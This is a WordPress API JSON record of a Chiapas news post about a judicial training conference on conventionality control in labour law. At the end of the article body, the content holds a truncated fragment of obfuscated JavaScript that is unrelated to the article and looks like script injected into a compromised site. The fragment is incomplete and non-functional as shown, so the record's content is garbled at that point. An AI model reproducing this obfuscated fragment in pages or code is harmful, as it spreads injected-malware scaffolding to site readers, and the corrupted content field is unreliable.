{"id":2884,"date":"2022-06-13T01:02:32","date_gmt":"2022-06-13T01:02:32","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2884"},"modified":"2022-06-13T01:02:33","modified_gmt":"2022-06-13T01:02:33","slug":"imparte-poder-judicial-conferencia-sobre-control-de-convencionalidad-en-materia-laboral","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2884","title":{"rendered":"Imparte  Poder Judicial conferencia sobre control de convencionalidad en materia laboral"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"480\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220612-WA0011-1024x480.jpg\" alt=\"\" class=\"wp-image-2885\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220612-WA0011-1024x480.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220612-WA0011-300x141.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220612-WA0011-768x360.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220612-WA0011.jpg 1041w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>12 de junio del 2022. Tuxtla Guit\u00e9rrez, Chiapas.- En el Poder Judicial, desde el programa continuo de capacitaci\u00f3n que impulsa el magistrado presidente Juan \u00d3scar Trinidad Palacios, se fomenta la profesionalizaci\u00f3n y actualizaci\u00f3n de las y los servidores p\u00fablicos, al igual que de los diversos sectores de la sociedad chiapaneca.Bajo este contexto, a trav\u00e9s del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial, se realiz\u00f3 la disertaci\u00f3n de la conferencia Aproximaci\u00f3n Conceptual y Pr\u00e1ctica al Control de Convencionalidad en Materia Laboral, impartida por el juez del Primer Tribunal Laboral del Estado de Puebla, Alejandro Varela L\u00f3pez.Esta conferencia virtual, que estuvo dirigida a las y los servidores p\u00fablicos adscritos a este Poder Judicial, as\u00ed como a barras, colegios de abogados y asociaciones de abogados litigantes, fue transmitida por Facebook Live en la p\u00e1gina del Poder Judicial, donde permanece p\u00fablica.Durante el inicio de su ponencia, el juez Alejandro Varela, agradeci\u00f3 al magistrado presidente Trinidad Palacios, la invitaci\u00f3n para participar en esta actividad, as\u00ed como a las consejeras de la Judicatura del Estado, Isela de Jes\u00fas Mart\u00ednez Flores y Mar\u00eda Itzel Ballinas Barbosa, y al director del Instituto de Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial, Pedro Farro \u00c1lvarez.Durante del desarrollo de la conferencia, el juez Varela L\u00f3pez realiz\u00f3 precisiones del tema y abord\u00f3 las problem\u00e1ticas de comprensi\u00f3n de paradigmas sobre las que hoy en d\u00eda se sustenta la ciencia del derecho y nuestro sistema jur\u00eddico mexicano, as\u00ed como los tipos de controles constitucionales y convencionales, el art\u00edculo 133 constitucional, entre otros elementos referentes a la tem\u00e1tica principal.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>12 de junio del 2022. Tuxtla Guit\u00e9rrez, Chiapas.- En el Poder Judicial, desde el programa continuo de capacitaci\u00f3n que impulsa el magistrado presidente Juan \u00d3scar Trinidad Palacios, se fomenta la profesionalizaci\u00f3n y actualizaci\u00f3n de las y los servidores p\u00fablicos, al igual que de los diversos sectores de la sociedad chiapaneca.Bajo este contexto, a trav\u00e9s del &hellip;<\/p>\n","protected":false},"author":2,"featured_media":2885,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-2884","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2884","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2884"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2884\/revisions"}],"predecessor-version":[{"id":2886,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2884\/revisions\/2886"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/2885"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2884"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2884"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2884"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}